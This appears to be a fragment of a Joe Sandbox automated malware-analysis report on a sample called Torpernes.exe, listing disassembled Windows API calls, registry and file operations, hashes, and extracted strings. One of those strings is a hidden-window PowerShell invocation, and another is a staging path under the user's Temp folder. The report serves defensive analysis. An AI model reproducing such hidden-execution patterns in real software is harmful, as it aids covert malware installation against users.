                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a5fb046d9c3c9ca283d4840ae6e8db3033aada834af1b2e0d9ecb340531529c3
                                            • Instruction ID: a4dec85b4f2f277edf9575adfc9b4107c5501948401582118949625260c0d92c
                                            • Opcode Fuzzy Hash: a5fb046d9c3c9ca283d4840ae6e8db3033aada834af1b2e0d9ecb340531529c3
                                            • Instruction Fuzzy Hash: A4814471E04228CBEF24CFA8C8447ADBBB1FF44305F25816AD856BB281D7785A96DF44
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            APIs
                                              • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6C
                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 00402411
                                            • RegCloseKey.ADVAPI32(?,?,?,0040A568,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                            Similarity
                                            • API ID: CloseOpenQueryValue
                                            • String ID:
                                            • API String ID: 3677997916-0
                                            APIs
                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            APIs
                                              • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6C
                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F4
                                            • RegCloseKey.ADVAPI32(00000000), ref: 004022FD
                                            Similarity
                                            • API ID: CloseDeleteOpenValue
                                            • String ID:
                                            • API String ID: 849931509-0
                                            APIs
                                            • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
                                            • EnableWindow.USER32(00000000,00000000), ref: 00401DE8
                                            Similarity
                                            • API ID: Window$EnableShow
                                            • String ID:
                                            • API String ID: 1136574915-0
                                            APIs
                                            • GetFileAttributesW.KERNELBASE(00000003,00402DA9,C:\Users\user\Desktop\Torpernes.exe,80000000,00000003,?,?,?,00000000,00403455,?), ref: 00405A89
                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403455,?), ref: 00405AAB
                                            Similarity
                                            • API ID: File$AttributesCreate
                                            • String ID:
                                            • API String ID: 415043291-0
                                            APIs
                                            • GetFileAttributesW.KERNELBASE(?,?,00405665,?,?,00000000,0040583B,?,?,?,?), ref: 00405A65
                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405A79
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            APIs
                                            • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040172C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: PathSearch
                                            • String ID:
                                            • API String ID: 2203818243-0
                                            • Opcode ID: 53f06e33fc5a1b6afd96b087539991c9c55cf30346cc6d73318182ea42a885f0
                                            • Instruction ID: 8c03d1068267bf34afbfcea84989045030d97b57746e23387a503ae4f4345c3c
                                            • Opcode Fuzzy Hash: 53f06e33fc5a1b6afd96b087539991c9c55cf30346cc6d73318182ea42a885f0
                                            • Instruction Fuzzy Hash: CAE04FB2314240AAD710DFA5DE48EEA77ACDB0036CF30467AE611A61D0E2B49A41972D
                                            APIs
                                            • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: Open
                                            • String ID:
                                            • API String ID: 71445658-0
                                            • Opcode ID: 44e0b576e29637486a21b5fbc1b0d2d218e8efd629f17f2245637563e5c98229
                                            • Instruction ID: f65b515b25232abf96548b9ad494cf34643fcd1092d5b4409f3cd7ecb0c7e4b5
                                            • Opcode Fuzzy Hash: 44e0b576e29637486a21b5fbc1b0d2d218e8efd629f17f2245637563e5c98229
                                            • Instruction Fuzzy Hash: 53E08676240108BFDB00DFA4DD47FD577ECEB14704F008421B609E70A1C774E54087A8
                                            APIs
                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031B1,00000000,00000000,00402FF1,000000FF,00000004,00000000,00000000,00000000), ref: 00405B1C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                            • Instruction ID: 4c61608b6bc4516409ad0b91e34087b92b67e4ba4ba38001e86525b3dc608f87
                                            • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                            • Instruction Fuzzy Hash: 41E0B63265425EABDF50AEA59C04AAB7B6CEB05360F004832F915F6290D231F8219AA5
                                            APIs
                                            • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: 32e1619a51f7570a6a3b8ffd60e038cbbdd898c186c873270c24c414923770af
                                            • Instruction ID: 4fddb98f6eff75a2f38ef4fd4ce8fbcf91927641295d3064ec740d6a2bf28992
                                            • Opcode Fuzzy Hash: 32e1619a51f7570a6a3b8ffd60e038cbbdd898c186c873270c24c414923770af
                                            • Instruction Fuzzy Hash: 9BD012B2B18100D7CB10DFE59A08ADDB7659B10329F304A77D101F21D0D2B885419A2A
                                            APIs
                                            • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404085
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: a3ec561b716cca9a07e24a276e245c065f41e56763f8222d9f4b5d0f47373cb7
                                            • Instruction ID: bb0ad24e73e2958be9e95b9dd025169b3dbcb7ce43939e5af5ed9013983f2583
                                            • Opcode Fuzzy Hash: a3ec561b716cca9a07e24a276e245c065f41e56763f8222d9f4b5d0f47373cb7
                                            • Instruction Fuzzy Hash: 12C09B717443007BDA308B509D45F1777686754710F14483D7744F50D4C674F421D61D
                                            APIs
                                            • SendMessageW.USER32(00000028,?,00000001,00403E88), ref: 0040406A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: 7569b990d3993be5e38fae2738398c0a747316f8fb90ffebe6f1ef05658bce18
                                            • Instruction ID: e4336e2cfbd41e748b944d74dd02d4a8bd9ce4dfb2de751b616b6052b3cbf02c
                                            • Opcode Fuzzy Hash: 7569b990d3993be5e38fae2738398c0a747316f8fb90ffebe6f1ef05658bce18
                                            • Instruction Fuzzy Hash: 4BB09235684201BAEA214B00ED49F957A62AB68701F008464B300240B0C6B244A2DB1A
                                            APIs
                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F30,?,?,?,?,00000000,00403455,?), ref: 004031C2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: FilePointer
                                            • String ID:
                                            • API String ID: 973152223-0
                                            • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                            • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                                            • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                            • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(?,00403E21), ref: 00404053
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            • Opcode ID: 4bb622bccf1f08ea545092c2085972f35b100486218bda082c58954abe8874f9
                                            • Instruction ID: c0ab7025b6f4db9671e0cb98d43949d97d44530e98ecb7646c4581f8057f458a
                                            • Opcode Fuzzy Hash: 4bb622bccf1f08ea545092c2085972f35b100486218bda082c58954abe8874f9
                                            • Instruction Fuzzy Hash: FCA001B6949100BFCB129B90EF48D0ABB62BBA4751B518A79B2459003486725871EB5A
                                            APIs
                                            • GetDlgItem.USER32(?,000003F9), ref: 00404A55
                                            • GetDlgItem.USER32(?,00000408), ref: 00404A60
                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404AAA
                                            • LoadBitmapW.USER32(0000006E), ref: 00404ABD
                                            • SetWindowLongW.USER32(?,000000FC,00405035), ref: 00404AD6
                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404AEA
                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404AFC
                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404B12
                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404B1E
                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404B30
                                            • DeleteObject.GDI32(00000000), ref: 00404B33
                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404B5E
                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404B6A
                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404C00
                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404C2B
                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404C3F
                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404C6E
                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404C7C
                                            • ShowWindow.USER32(?,00000005), ref: 00404C8D
                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404D8A
                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404DEF
                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404E04
                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404E28
                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404E48
                                            • ImageList_Destroy.COMCTL32(?), ref: 00404E5D
                                            • GlobalFree.KERNEL32(?), ref: 00404E6D
                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404EE6
                                            • SendMessageW.USER32(?,00001102,?,?), ref: 00404F8F
                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F9E
                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00404FBE
                                            • ShowWindow.USER32(?,00000000), ref: 0040500C
                                            • GetDlgItem.USER32(?,000003FE), ref: 00405017
                                            • ShowWindow.USER32(00000000), ref: 0040501E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                            • String ID: $M$N
                                            • API String ID: 1638840714-813528018
                                            • Opcode ID: b390996d46cd98e283d69fcdb72103580f7ea8abd4757dd5e45084b4b85de18d
                                            • Instruction ID: 984333f753bf963cf7c1d03b693c7aaf3de5c02cdfbc3fe81bdc063d441272a2
                                            • Opcode Fuzzy Hash: b390996d46cd98e283d69fcdb72103580f7ea8abd4757dd5e45084b4b85de18d
                                            • Instruction Fuzzy Hash: C10282B0A00209EFEB209F55DD85AAE7BB5FB84314F50813AF610B62E1C7799D52CF58
                                            APIs
                                            • GetDlgItem.USER32(?,000003FB), ref: 00404511
                                            • SetWindowTextW.USER32(00000000,?), ref: 0040453B
                                            • SHBrowseForFolderW.SHELL32(?), ref: 004045EC
                                            • CoTaskMemFree.OLE32(00000000), ref: 004045F7
                                            • lstrcmpiW.KERNEL32(Execute: ,004226B0,00000000,?,?), ref: 00404629
                                            • lstrcatW.KERNEL32(?,Execute: ), ref: 00404635
                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404647
                                              • Part of subcall function 004055D9: GetDlgItemTextW.USER32(?,?,00000400,0040467E), ref: 004055EC
                                              • Part of subcall function 004060AD: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Torpernes.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031D7,C:\Users\user\AppData\Local\Temp\,74DF3420,004033E7), ref: 00406110
                                              • Part of subcall function 004060AD: CharNextW.USER32(?,?,?,00000000), ref: 0040611F
                                              • Part of subcall function 004060AD: CharNextW.USER32(?,"C:\Users\user\Desktop\Torpernes.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031D7,C:\Users\user\AppData\Local\Temp\,74DF3420,004033E7), ref: 00406124
                                              • Part of subcall function 004060AD: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031D7,C:\Users\user\AppData\Local\Temp\,74DF3420,004033E7), ref: 00406137
                                            • GetDiskFreeSpaceW.KERNEL32(00420680,?,?,0000040F,?,00420680,00420680,?,00000000,00420680,?,?,000003FB,?), ref: 00404709
                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404724
                                              • Part of subcall function 0040487D: lstrlenW.KERNEL32(004226B0,004226B0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 0040491E
                                              • Part of subcall function 0040487D: wsprintfW.USER32 ref: 00404927
                                              • Part of subcall function 0040487D: SetDlgItemTextW.USER32(?,004226B0), ref: 0040493A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: "powershell.exe" -windowstyle hidden$A$C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes$Execute:
                                            • API String ID: 2624150263-314068772
                                            • Opcode ID: 0872472f253eb43d78c96496c0214350b1dc56a7ad2682dbc0c7061730063538
                                            • Instruction ID: fad5de195099c4bb125bb843149892d88f7ab0b1647696bda0d7f1fd53d0c9ab
                                            • Opcode Fuzzy Hash: 0872472f253eb43d78c96496c0214350b1dc56a7ad2682dbc0c7061730063538
                                            • Instruction Fuzzy Hash: 8DA18FB1900208ABDB11AFA5CC45AAF77B8EF85314F10843BF611B62D1D77C9A418B6D
                                            APIs
                                            • CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Vaabenstyringssystems, xrefs: 004020FB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: CreateInstance
                                            • String ID: C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Vaabenstyringssystems
                                            • API String ID: 542301482-1539819606
                                            • Opcode ID: f373231bb21bdd950d0031a3fa84380e2d7a1430d357a16df16077b9457b71b4
                                            • Instruction ID: 67f9a033abe0f7de6a447e7deefe4003bd277624c69769909c070b3822ab9271
                                            • Opcode Fuzzy Hash: f373231bb21bdd950d0031a3fa84380e2d7a1430d357a16df16077b9457b71b4
                                            • Instruction Fuzzy Hash: 99415E75A00105BFCB00DFA8C988EAE7BB5EF49318B20416AF905EF2D1CA79AD41CB54
                                            APIs
                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: FileFindFirst
                                            • String ID:
                                            • API String ID: 1974802433-0
                                            • Opcode ID: 46a75bfcdf0f655e43968d2b9fd1626b2727312735866fde2716e11fe0eeafa7
                                            • Instruction ID: b58eb35c91f3af3aa650dd11b58d04068e1d23ce00575ed06420bd268ccdbeaf
